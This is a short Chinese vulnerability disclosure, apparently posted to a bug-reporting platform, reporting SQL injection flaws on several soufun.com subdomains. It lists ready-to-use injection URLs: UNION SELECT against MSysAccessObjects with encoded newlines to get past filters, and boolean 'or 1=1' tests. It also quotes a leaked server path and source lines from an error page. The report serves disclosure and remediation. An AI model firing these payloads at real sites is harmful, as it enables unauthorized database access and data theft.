简要描述：注射可导致主机相关信息泄露，以及进一步的渗透。望管理员及时修复，以免造成对主机安全影响。
详细说明：1、
 
http://njbbs.soufun.com/zhuanti/njxn/njxnvote.asp
 
?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects
2、
 
http://nree.soufun.com/2007spring/guangzhou/show2.asp
 
?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects
3、
 
http://dg.soufun.com/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1
4、
http://szesftest.soufun.com/sechouse2/products.asp
 
?BigClassName=%B6%FE%CA%D6%B7%BF
 
&SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1
漏洞证明：1、
 
http://njbbs.soufun.com/zhuanti/njxn/njxnvote.asp
 
?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects
2、
 
http://nree.soufun.com/2007spring/guangzhou/show2.asp
 
?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects
3、
 
http://dg.soufun.com/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1
4、
http://szesftest.soufun.com/sechouse2/products.asp
 
?BigClassName=%B6%FE%CA%D6%B7%BF
 
&SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1
 
 
http://www.soufun.com/space/Other/Posts.aspx?userid=5469987
泄露信息主机路径：
Source File: e:\soufun\spacen.soufun.com\Other\Posts.aspx Line: 6
 
Line 4:  <%@ MasterType VirtualPath="~/Visit.Master" %>
 
Line 5:  <asp:Content ID="TitleContent" ContentPlaceHolderID="TitleContent" runat="server">
 
Line 6:      <%=Master.visitUser.UserName%>- 家庭空间- 搜房网
 
Line 7:  </asp:Content>
 
Line 8:  <asp:Content ID="HeadContent" ContentPlaceHolderID="HeadContent" runat="server">
 
 
修复方案：过滤
 
 
作者 孤狐浪子